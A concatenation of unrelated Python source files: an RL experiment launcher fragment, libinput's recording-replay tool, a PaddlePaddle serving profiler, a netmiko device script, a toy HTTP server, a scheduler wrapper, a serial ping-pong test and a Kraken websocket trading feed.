seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
libinput-replay.py
|
#!/usr/bin/env python3
# vim: set expandtab shiftwidth=4:
# -*- Mode: python; coding: utf-8; indent-tabs-mode: nil -*- */
#
# Copyright © 2018 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import os
import sys
import time
import math
import multiprocessing
import argparse
from pathlib import Path
try:
import libevdev
import yaml
import pyudev
except ModuleNotFoundError as e:
print("Error: {}".format(e), file=sys.stderr)
print(
"One or more python modules are missing. Please install those "
"modules and re-run this tool."
)
sys.exit(1)
SUPPORTED_FILE_VERSION = 1
def error(msg, **kwargs):
print(msg, **kwargs, file=sys.stderr)
class YamlException(Exception):
pass
def fetch(yaml, key):
"""Helper function to avoid confusing a YAML error with a
normal KeyError bug"""
try:
return yaml[key]
except KeyError:
raise YamlException("Failed to get '{}' from recording.".format(key))
def check_udev_properties(yaml_data, uinput):
"""
Compare the properties our new uinput device has with the ones from the
recording and ring the alarm bell if one of them is off.
"""
yaml_udev_section = fetch(yaml_data, "udev")
yaml_udev_props = fetch(yaml_udev_section, "properties")
yaml_props = {
k: v for (k, v) in [prop.split("=", maxsplit=1) for prop in yaml_udev_props]
}
try:
# We don't assign this one to virtual devices
del yaml_props["LIBINPUT_DEVICE_GROUP"]
except KeyError:
pass
# give udev some time to catch up
time.sleep(0.2)
context = pyudev.Context()
udev_device = pyudev.Devices.from_device_file(context, uinput.devnode)
for name, value in udev_device.properties.items():
if name in yaml_props:
if yaml_props[name] != value:
error(
f"Warning: udev property mismatch: recording has {name}={yaml_props[name]}, device has {name}={value}"
)
del yaml_props[name]
else:
# The list of properties we add to the recording, see libinput-record.c
prefixes = (
"ID_INPUT",
"LIBINPUT",
"EVDEV_ABS",
"MOUSE_DPI",
"POINTINGSTICK_",
)
for prefix in prefixes:
if name.startswith(prefix):
error(f"Warning: unexpected property: {name}={value}")
# the ones we found above were removed from the dict
for name, value in yaml_props.items():
error(f"Warning: device is missing recorded udev property: {name}={value}")
def create(device):
evdev = fetch(device, "evdev")
d = libevdev.Device()
d.name = fetch(evdev, "name")
ids = fetch(evdev, "id")
if len(ids) != 4:
raise YamlException("Invalid ID format: {}".format(ids))
d.id = dict(zip(["bustype", "vendor", "product", "version"], ids))
codes = fetch(evdev, "codes")
for evtype, evcodes in codes.items():
for code in evcodes:
data = None
if evtype == libevdev.EV_ABS.value:
values = fetch(evdev, "absinfo")[code]
absinfo = libevdev.InputAbsInfo(
minimum=values[0],
maximum=values[1],
fuzz=values[2],
flat=values[3],
resolution=values[4],
)
data = absinfo
elif evtype == libevdev.EV_REP.value:
if code == libevdev.EV_REP.REP_DELAY.value:
data = 500
elif code == libevdev.EV_REP.REP_PERIOD.value:
data = 20
d.enable(libevdev.evbit(evtype, code), data=data)
properties = fetch(evdev, "properties")
for prop in properties:
d.enable(libevdev.propbit(prop))
uinput = d.create_uinput_device()
check_udev_properties(device, uinput)
return uinput
def print_events(devnode, indent, evs):
devnode = os.path.basename(devnode)
for e in evs:
print(
"{}: {}{:06d}.{:06d} {} / {:<20s} {:4d}".format(
devnode,
" " * (indent * 8),
e.sec,
e.usec,
e.type.name,
e.code.name,
e.value,
)
)
def replay(device, verbose):
events = fetch(device, "events")
if events is None:
return
uinput = device["__uinput"]
# The first event may have a nonzero offset but we want to replay
# immediately regardless. When replaying multiple devices, the first
# offset is the offset from the first event on any device.
offset = time.time() - device["__first_event_offset"]
if offset < 0:
error("WARNING: event time offset is in the future, refusing to replay")
return
# each 'evdev' set contains one SYN_REPORT so we only need to check for
# the time offset once per event
for event in events:
try:
evdev = fetch(event, "evdev")
except YamlException:
continue
(sec, usec, evtype, evcode, value) = evdev[0]
evtime = sec + usec / 1e6 + offset
now = time.time()
if evtime - now > 150 / 1e6: # 150 µs error margin
time.sleep(evtime - now - 150 / 1e6)
evs = [
libevdev.InputEvent(
libevdev.evbit(e[2], e[3]), value=e[4], sec=e[0], usec=e[1]
)
for e in evdev
]
uinput.send_events(evs)
if verbose:
print_events(uinput.devnode, device["__index"], evs)
def first_timestamp(device):
events = fetch(device, "events")
for e in events or []:
try:
evdev = fetch(e, "evdev")
(sec, usec, *_) = evdev[0]
return sec + usec / 1.0e6
except YamlException:
pass
return None
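# Illustrative sketch (hypothetical helper, not called by this tool): the
# timing arithmetic used by loop() and replay(), with plain numbers instead
# of evdev events. toffset is the earliest recorded timestamp across all
# devices; every event is then scheduled at its recorded time shifted so that
# this earliest event replays immediately.
def _replay_timing_sketch():
    recorded = [100.000200, 100.000900, 100.250000]  # seconds, as in a recording
    toffset = min(recorded)
    offset = time.time() - toffset
    for ts in recorded:
        target = ts + offset  # wall-clock time at which to emit this event
        delay = target - time.time()
        if delay > 150 / 1e6:  # same 150 µs error margin as replay()
            time.sleep(delay - 150 / 1e6)
        elapsed = time.time() - (toffset + offset)
        print("event recorded at {:.6f} replayed {:.6f}s after start".format(ts, elapsed))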
def wrap(func, *args):
try:
func(*args)
except KeyboardInterrupt:
pass
def loop(args, recording):
devices = fetch(recording, "devices")
first_timestamps = tuple(
filter(lambda x: x is not None, [first_timestamp(d) for d in devices])
)
# All devices need to start replaying at the same time, so let's find
# the very first event and offset everything by that timestamp.
toffset = min(first_timestamps or [math.inf])
for idx, d in enumerate(devices):
uinput = create(d)
print("{}: {}".format(uinput.devnode, uinput.name))
d["__uinput"] = uinput # cheaper to hide it in the dict then work around it
d["__index"] = idx
d["__first_event_offset"] = toffset
if not first_timestamps:
input("No events in recording. Hit enter to quit")
return
while True:
input("Hit enter to start replaying")
processes = []
for d in devices:
p = multiprocessing.Process(target=wrap, args=(replay, d, args.verbose))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
del processes
def create_device_quirk(device):
try:
quirks = fetch(device, "quirks")
if not quirks:
return None
except YamlException:
return None
# Where the device has a quirk, we match on name, vendor and product.
# That's the best match we can assemble here from the info we have.
evdev = fetch(device, "evdev")
name = fetch(evdev, "name")
id = fetch(evdev, "id")
quirk = (
"[libinput-replay {name}]\n"
"MatchName={name}\n"
"MatchVendor=0x{id[1]:04X}\n"
"MatchProduct=0x{id[2]:04X}\n"
).format(name=name, id=id)
quirk += "\n".join(quirks)
return quirk
def setup_quirks(recording):
devices = fetch(recording, "devices")
overrides = None
quirks = []
for d in devices:
if "quirks" in d:
quirk = create_device_quirk(d)
if quirk:
quirks.append(quirk)
if not quirks:
return None
overrides = Path("/etc/libinput/local-overrides.quirks")
if overrides.exists():
print(
"{} exists, please move it out of the way first".format(overrides),
file=sys.stderr,
)
sys.exit(1)
overrides.parent.mkdir(exist_ok=True)
with overrides.open("w+") as fd:
fd.write("# This file was generated by libinput replay\n")
fd.write("# Unless libinput replay is running right now, remove this file.\n")
fd.write("\n\n".join(quirks))
return overrides
def check_file(recording):
version = fetch(recording, "version")
if version != SUPPORTED_FILE_VERSION:
raise YamlException(
"Invalid file format: {}, expected {}".format(
version, SUPPORTED_FILE_VERSION
)
)
ndevices = fetch(recording, "ndevices")
devices = fetch(recording, "devices")
if ndevices != len(devices):
error(
"WARNING: truncated file, expected {} devices, got {}".format(
ndevices, len(devices)
)
)
def main():
parser = argparse.ArgumentParser(description="Replay a device recording")
parser.add_argument(
"recording",
metavar="recorded-file.yaml",
type=str,
help="Path to device recording",
)
parser.add_argument("--verbose", action="store_true")
args = parser.parse_args()
quirks_file = None
try:
with open(args.recording) as f:
y = yaml.safe_load(f)
check_file(y)
quirks_file = setup_quirks(y)
loop(args, y)
except KeyboardInterrupt:
pass
except (PermissionError, OSError) as e:
error("Error: failed to open device: {}".format(e))
except YamlException as e:
error("Error: failed to parse recording: {}".format(e))
finally:
if quirks_file:
quirks_file.unlink()
if __name__ == "__main__":
main()
|
profiler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
import sys
import logging
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
from time import time as _time
import time
import threading
import multiprocessing
_LOGGER = logging.getLogger(__name__)
_LOGGER.propagate = False
class PerformanceTracer(object):
def __init__(self, is_thread_mode, interval_s, server_worker_num):
self._is_thread_mode = is_thread_mode
if is_thread_mode:
            # Channels created in thread mode cannot be accessed across
            # processes, so in thread mode the PerformanceTracer runs as a
            # thread as well. Throughput may then be limited by the GIL.
self._data_buffer = Queue.Queue()
else:
self._data_buffer = multiprocessing.Manager().Queue()
self._interval_s = interval_s
self._thrd = None
self._proc = None
self._channels = []
# The size of data in Channel will not exceed server_worker_num
self._server_worker_num = server_worker_num
def data_buffer(self):
return self._data_buffer
def start(self):
if self._is_thread_mode:
self._thrd = threading.Thread(
target=self._trace_func, args=(self._channels, ))
self._thrd.daemon = True
self._thrd.start()
else:
self._proc = multiprocessing.Process(
target=self._trace_func, args=(self._channels, ))
self._proc.daemon = True
self._proc.start()
def set_channels(self, channels):
self._channels = channels
def _trace_func(self, channels):
all_actions = ["in", "prep", "midp", "postp", "out"]
calcu_actions = ["prep", "midp", "postp"]
while True:
op_cost = {}
err_request = []
err_count = 0
_LOGGER.info("==================== TRACER ======================")
# op
while True:
try:
item = self._data_buffer.get_nowait()
name = item["name"]
actions = item["actions"]
if name == "DAG":
succ = item["succ"]
req_id = item["id"]
if not succ:
err_count += 1
err_request.append(req_id)
if name not in op_cost:
op_cost[name] = {}
for action, cost in actions.items():
if action not in op_cost[name]:
op_cost[name][action] = []
op_cost[name][action].append(cost)
except Queue.Empty:
break
if len(op_cost) != 0:
for name in op_cost:
tot_cost, calcu_cost = 0.0, 0.0
for action, costs in op_cost[name].items():
op_cost[name][action] = sum(costs) / (1e3 * len(costs))
tot_cost += op_cost[name][action]
if name != "DAG":
_LOGGER.info("Op({}):".format(name))
for action in all_actions:
if action in op_cost[name]:
_LOGGER.info("\t{}[{} ms]".format(
action, op_cost[name][action]))
for action in calcu_actions:
if action in op_cost[name]:
calcu_cost += op_cost[name][action]
_LOGGER.info("\tidle[{}]".format(1 - 1.0 * calcu_cost /
tot_cost))
if "DAG" in op_cost:
calls = op_cost["DAG"].values()
calls.sort()
tot = len(calls)
qps = 1.0 * tot / self._interval_s
ave_cost = sum(calls) / tot
latencys = [50, 60, 70, 80, 90, 95, 99]
_LOGGER.info("DAGExecutor:")
_LOGGER.info("\tQuery count[{}]".format(tot))
_LOGGER.info("\tQPS[{} q/s]".format(qps))
_LOGGER.info("\tSucc[{}]".format(1 - 1.0 * err_count / tot))
_LOGGER.info("\tError req[{}]".format(", ".join(
[str(x) for x in err_request])))
_LOGGER.info("\tLatency:")
_LOGGER.info("\t\tave[{} ms]".format(ave_cost))
for latency in latencys:
_LOGGER.info("\t\t.{}[{} ms]".format(latency, calls[int(
tot * latency / 100.0)]))
# channel
_LOGGER.info("Channel (server worker num[{}]):".format(
self._server_worker_num))
for channel in channels:
_LOGGER.info("\t{}(In: {}, Out: {}) size[{}/{}]".format(
channel.name,
channel.get_producers(),
channel.get_consumers(),
channel.size(), channel.get_maxsize()))
time.sleep(self._interval_s)
class UnsafeTimeProfiler(object):
""" thread unsafe profiler """
def __init__(self):
self.pid = os.getpid()
self.print_head = 'PROFILE\tpid:{}\t'.format(self.pid)
self.time_record = [self.print_head]
self._enable = False
def enable(self, enable):
self._enable = enable
def record(self, name):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
self.time_record.append('{}:{} '.format(name, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
self.time_record.append('\n')
profile_str = ''.join(self.time_record)
self.time_record = [self.print_head]
return profile_str
class TimeProfiler(object):
def __init__(self):
self._pid = os.getpid()
self._print_head = 'PROFILE\tpid:{}\t'.format(self._pid)
self._time_record = Queue.Queue()
self._enable = False
self._lock = threading.Lock()
def enable(self, enable):
self._enable = enable
def record(self, name_with_tag):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
name_with_tag = name_with_tag.split("_")
tag = name_with_tag[-1]
name = '_'.join(name_with_tag[:-1])
with self._lock:
self._time_record.put((name, tag, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
print_str = self._print_head
tmp = {}
with self._lock:
while not self._time_record.empty():
name, tag, timestamp = self._time_record.get()
if name in tmp:
ptag, ptimestamp = tmp.pop(name)
print_str += "{}_{}:{} ".format(name, ptag, ptimestamp)
print_str += "{}_{}:{} ".format(name, tag, timestamp)
else:
tmp[name] = (tag, timestamp)
print_str = "\n{}\n".format(print_str)
for name, item in tmp.items():
tag, timestamp = item
self._time_record.put((name, tag, timestamp))
return print_str
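# Illustrative usage sketch (assumption: this module is executed directly,
# which the serving pipeline does not do). record() pairs two calls that
# share a name prefix, so "demo_0"/"demo_1" below show up as one start/end
# pair written to stderr by print_profile().
if __name__ == "__main__":
    _profiler = TimeProfiler()
    _profiler.enable(True)
    _profiler.record("demo_0")
    time.sleep(0.01)
    _profiler.record("demo_1")
    _profiler.print_profile()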
|
ex6.py
|
#! /usr/bin/env python
from datetime import datetime
import threading
import django
django.setup()
from net_system.models import NetworkDevice, Credentials
from netmiko import ConnectHandler
def show_version(device):
creds = device.credentials
    rconn = ConnectHandler(
        device_type=device.device_type,
        ip=device.ip_address,
        username=creds.username,
        password=creds.password,
        port=device.port,
        secret='',
    )
print()
print("*" * 80)
print(device)
print("*" * 80)
print(rconn.send_command('show version'))
print("*" * 80)
print()
rconn.disconnect()
def main():
my_devices = NetworkDevice.objects.all()
start_time = datetime.now()
for device in my_devices:
        my_thread = threading.Thread(target=show_version, args=(device,))
my_thread.start()
main_thread = threading.currentThread()
for th in threading.enumerate():
if th != main_thread:
print(th)
th.join()
print("Elapsed time: {}".format(datetime.now()-start_time))
if __name__ == "__main__":
main()
|
MyWevServer.py
|
# coding:utf-8
import socket
import re
import sys
from multiprocessing import Process
# Static file root directory
HTML_ROOT_DIR = "./html"
PYTHON_ROOT_DIR = "./wsgibins"
class HTTPServer(object):
""""""
def __init__(self, application):
self.app = application
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def bind(self, address):
self.server_socket.bind(address)
def start(self):
self.server_socket.listen(128)
while True:
client_socket, client_address = self.server_socket.accept()
# print("[%s, %s]用户连接上了" % (client_address[0],client_address[1]))
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Process(target=self.handle_client, args=(client_socket,))
handle_client_process.start()
client_socket.close()
def start_response(self, status, headers):
server_headers = [
("Server", "My Server")
]
self.headers_set = [status, server_headers+headers]
def handle_client(self, client_socket):
"""处理客户端请求"""
# 获取客户端请求数据
request_data = client_socket.recv(1024)
print("request data:", request_data)
request_lines = request_data.splitlines()
for line in request_lines:
print(line)
        # Parse the request line
# 'GET / HTTP/1.1'
request_start_line = request_lines[0]
        # Extract the requested path from the start line
print("*"*10)
print(request_start_line.decode("utf-8"))
file_name = re.match(r"\w+ +(/[^ ]*) ", request_start_line.decode("utf-8")).group(1)
environ = {
"PATH_INFO":file_name
}
response_body = self.app(environ, self.start_response)
response = "HTTP/1.1 " + self.headers_set[0] + "\r\n"
if len(self.headers_set)>1:
for header in self.headers_set[1]:
response += "%s: %s\r\n" % header
response += "\r\n"
response += response_body
        # Send the response back to the client
        client_socket.send(bytes(response, "utf-8"))
        # Close the client connection
        client_socket.close()
def main():
# sys.path.insert(1, PYTHON_ROOT_DIR)
if len(sys.argv)<2:
sys.exit()
web_module_name, web_application_name = sys.argv[1].split(":")
web_module = __import__(web_module_name)
web_application = getattr(web_module, web_application_name)
app = web_application()
server = HTTPServer(app)
server.bind(("", 8000))
server.start()
if __name__ == "__main__":
main()
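# Illustrative sketch (hypothetical application, not wired into main()): a
# minimal application class matching this server's calling convention. Note
# that unlike real WSGI, handle_client() concatenates the return value into a
# str, so __call__ returns a str rather than an iterable of bytes. Assuming
# this file is importable as MyWevServer, it could be served with
# `python MyWevServer.py MyWevServer:DemoApp`.
class DemoApp(object):
    def __call__(self, environ, start_response):
        start_response("200 OK", [("Content-Type", "text/plain")])
        return "Hello, you requested %s\r\n" % environ["PATH_INFO"]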
|
scheduler.py
|
import sched
import time
import datetime
import threading
class Scheduler:
def __init__(self, timef=time.time, delayf=time.sleep):
# Declaration
self.__sched_obj = None
# Initialization
self.__sched_obj = sched.scheduler(timef, delayf)
def show(self):
print('*' * 20)
print('Total Event Number: {0:d}\n'.format(
len(self.__sched_obj.queue)))
for index, item in enumerate(self.__sched_obj.queue):
print('Event {0:d} {1}'.format(index, item))
print('*' * 20)
    # @instance: either a datetime.datetime (absolute time) or a delay in seconds
    # @argv: argument tuple forwarded to the action, much like pthread_create's arg pointer
def regist(self, instance, act, argv, prio=0):
if isinstance(instance, datetime.datetime):
self.__sched_obj.enterabs(instance.timestamp(), prio, act, argv)
        else:  # treat instance as a relative delay in seconds
# Prototype: sched.enter(timesec, prio, act, *argv, **kwarg)
self.__sched_obj.enter(instance, prio, act, argv)
def cancel(self, event_index):
self.__sched_obj.cancel(self.__sched_obj.queue[event_index])
def run(self, blocking=True):
self.__sched_obj.run(blocking)
def daemon(self, blocking=True):
thrd = threading.Thread(target=self.run, args=[blocking])
thrd.start()
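# Illustrative usage sketch (assumption: this file is run directly; nothing
# below executes on import). One event is registered with a relative delay
# and one with an absolute datetime, then both are listed and run. Note that
# sched computes the relative event's fire time at registration, not at run().
if __name__ == '__main__':
    s = Scheduler()
    s.regist(1.0, print, ('relative event: ~1s after registration',))
    s.regist(datetime.datetime.now() + datetime.timedelta(seconds=2),
             print, ('absolute event: ~2s after registration',))
    s.show()
    s.run()  # blocks until both events have fired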
|
pingpong-serial.py
|
#!/usr/bin/python
# use serial python lib included in MansOS
import sys
sys.path.append('../../../mos/make/scripts')
import serial
import threading
import random
import time
baudRate = 38400
try:
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=baudRate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
except serial.serialutil.SerialException, ( msg ):
print "\nSerial exception:\n\t", msg
flDone = True
def main():
global flDone, ser
flDone = False
print "MansOS serial Ping-Pong"
print "It sends random binary values to the mote, it sends back"
print "messages of form \"Pong <x>\", where <x> is the value sent"
print "Mote also sends \"Ping <y>\" periodically, where <y> is it's local counter"
threading.Thread(target=listenSerial).start()
threading.Thread(target=sendSerial).start()
#Keyboard scanning loop
while (not flDone):
try:
s = raw_input()
except:
print "\nKeyboard interrupt"
flDone = True
return 0
if s == 'q' :
flDone = True
return 0
def listenSerial():
global flDone, ser
print "Listening to serial port: ", ser.portstr, ", rate: ", baudRate
while (not flDone):
s = ser.read(1)
sys.stdout.write( s )
sys.stdout.flush()
print "\nDone"
ser.close()
return 0
def sendSerial():
global ser
random.seed();
while (not flDone):
b = random.randint(1, 9)
# send 5 bytes containing the same digit and the newline
s = str(b) + str(b) + str(b) + str(b) + str(b) + "\n"
print "-- sending " + s
ser.write(s);
time.sleep(random.randint(1,3))
return 0
if __name__ == "__main__":
main()
|
kraken_feeder.py
|
import base64
import hashlib
import hmac
import json
import sys
import os
import threading
import time
import urllib.request
from datetime import datetime
from websocket import create_connection
import logging
from tradingkit.data.feed.feeder import Feeder
from tradingkit.pubsub.core.publisher import Publisher
from tradingkit.pubsub.event.book import Book
from tradingkit.pubsub.event.candle import Candle
from tradingkit.pubsub.event.order import Order
from tradingkit.pubsub.event.trade import Trade
class KrakenFeeder(Feeder, Publisher):
# Converts symbols from normal to kraken vocab
DENORMALIZED_SYMBOL = {
"BTC/EUR": "XBT/EUR",
"BTC/USD": "XBT/USD",
"BTC/USDT": "XBT/USDT",
"ETH/BTC": "ETH/XBT",
}
# Converts symbols from kraken to normal vocab
NORMALIZED_SYMBOL = {
"XBT/EUR": "BTC/EUR",
"XBT/USD": "BTC/USD",
"XBT/USDT": "BTC/USDT",
"ETH/XBT": "ETH/BTC",
}
orderbooks = {}
def __init__(self, credentials=None, ignore_outdated=False, pair=None):
super().__init__()
if pair is None:
pair = {'symbol': 'BTC/EUR'}
self.public_ws = None
self.private_ws = None
if credentials is not None:
            if 'apiKey' not in credentials or 'secret' not in credentials:
raise KeyError("credentials must contain apiKey and secret")
self.credentials = credentials
self.symbol = self.DENORMALIZED_SYMBOL[pair['symbol']] # used to send requests to kraken
self.on_open()
self.ignore_outdated = ignore_outdated
self.lock = None
self.candle = {'id': '', 'data': {}}
def authenticate(self):
api_nonce = bytes(str(int(time.time() * 1000)), "utf-8")
api_request = urllib.request.Request("https://api.kraken.com/0/private/GetWebSocketsToken",
b"nonce=%s" % api_nonce)
api_request.add_header("API-Key", self.credentials['apiKey'])
api_request.add_header("API-Sign", base64.b64encode(hmac.new(base64.b64decode(self.credentials['secret']),
b"/0/private/GetWebSocketsToken" + hashlib.sha256(
api_nonce + b"nonce=%s" % api_nonce).digest(),
hashlib.sha512).digest()))
resp = json.loads(urllib.request.urlopen(api_request).read())
if 'result' in resp and 'token' in resp['result']:
resp = resp['result']['token']
return resp
def on_open(self):
api_domain = "wss://ws.kraken.com/"
auth_api_domain = "wss://ws-auth.kraken.com"
try:
self.public_ws = create_connection(api_domain)
except Exception as error:
logging.info("WebSocket connection failed (%s)" % error)
time.sleep(600)
self.on_open()
try:
self.private_ws = create_connection(auth_api_domain)
except Exception as error:
logging.info("WebSocket connection failed (%s)" % error)
time.sleep(600)
self.on_open()
token = self.authenticate()
self.subscribe(token)
def subscribe(self, token):
api_feed = "book"
api_depth = 10
book_feed = '{"event":"subscribe", "subscription":{"name":"%(feed)s", "depth":%(depth)s}, "pair":["%(symbol)s"]}' % {
"feed": api_feed, "depth": api_depth, "symbol": self.symbol}
trade_feed = '{"event": "subscribe", "pair": ["%(symbol)s"], "subscription": {"name": "trade", "token": "%(token)s"}}' % {
"symbol": self.symbol, 'token': token}
own_trades_feed = '{"event": "subscribe", "subscription": {"name": "ownTrades","token": "%(token)s"}}' % {
'token': token}
try:
self.public_ws.send(trade_feed)
self.public_ws.send(book_feed)
self.private_ws.send(own_trades_feed)
except Exception as error:
logging.info("Feed subscription failed (%s)" % error)
self.public_ws.close()
self.private_ws.close()
sys.exit(1)
def dispatch_event(self, event):
self.lock.acquire()
self.dispatch(event)
self.lock.release()
def on_message(self, message):
if "ownTrades" in message:
order_data_list = self.transform_order_data(message)
for order_data in order_data_list:
self.dispatch_event(Order(order_data))
elif "book-10" in message:
order_book = self.transform_book_data(message)
self.dispatch_event(Book(order_book))
elif "trade" in message:
trade_data_list = self.transform_trade_data(message)
for trade_data in trade_data_list:
self.dispatch_event(Trade(trade_data))
def run(self, is_private):
if is_private:
_ws = self.private_ws
else:
_ws = self.public_ws
while True:
ws_data = "No Data."
try:
ws_data = _ws.recv()
if ws_data:
message = json.loads(ws_data)
self.on_message(message)
except KeyboardInterrupt:
_ws.close()
sys.exit(0)
except Exception as error:
logging.info("[WebSocket error] %s" % str(error))
logging.info("[WebSocket data] %s" % str(ws_data))
time.sleep(60)
self.on_open()
if is_private:
_ws = self.private_ws
else:
_ws = self.public_ws
def feed(self):
# creating a lock
self.lock = threading.Lock()
# creating threads
public_t = threading.Thread(target=self.run, args=(False,))
private_t = threading.Thread(target=self.run, args=(True,))
# start threads
public_t.start()
private_t.start()
# wait until threads finish their job
public_t.join()
logging.info("[WebSocket data public STOP] %s" % str(public_t))
private_t.join()
logging.info("[WebSocket data private STOP] %s" % str(private_t))
def transform_book_data(self, message):
keys = message[1].keys()
symbol = self.NORMALIZED_SYMBOL[message[-1]]
if "as" in keys:
self.orderbooks[symbol] = {
"bids": [
[
float(message[1]["bs"][0][0]),
float(message[1]["bs"][0][1])
]
],
"asks": [
[
float(message[1]["as"][0][0]),
float(message[1]["as"][0][1])
]
],
"timestamp": int(float(message[1]["as"][0][2]) * 1000),
"symbol": symbol,
'exchange': 'kraken'
}
else:
if "a" in keys:
self.orderbooks[symbol]["asks"] = [
[
float(message[1]["a"][0][0]),
float(message[1]["a"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(message[1]["a"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
if "b" in keys:
self.orderbooks[symbol]["bids"] = [
[
float(message[1]["b"][0][0]),
float(message[1]["b"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(message[1]["b"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
return self.orderbooks[symbol]
def transform_trade_data(self, message):
trade_data_list = []
symbol = self.NORMALIZED_SYMBOL[message[-1]]
for trade in message[1]:
price = float(trade[0])
amount = float(trade[1])
cost = float(trade[0]) * float(trade[1])
timestamp = int(float(trade[2]) * 1000)
side = 'buy' if trade[3] == 'b' else 'sell'
type = 'market' if trade[4] == 'm' else 'limit'
trade_data = {
'price': price,
'amount': amount,
'cost': cost,
'timestamp': timestamp,
'side': side,
'type': type,
'symbol': symbol,
'exchange': 'kraken'
}
trade_data_list.append(trade_data)
return trade_data_list
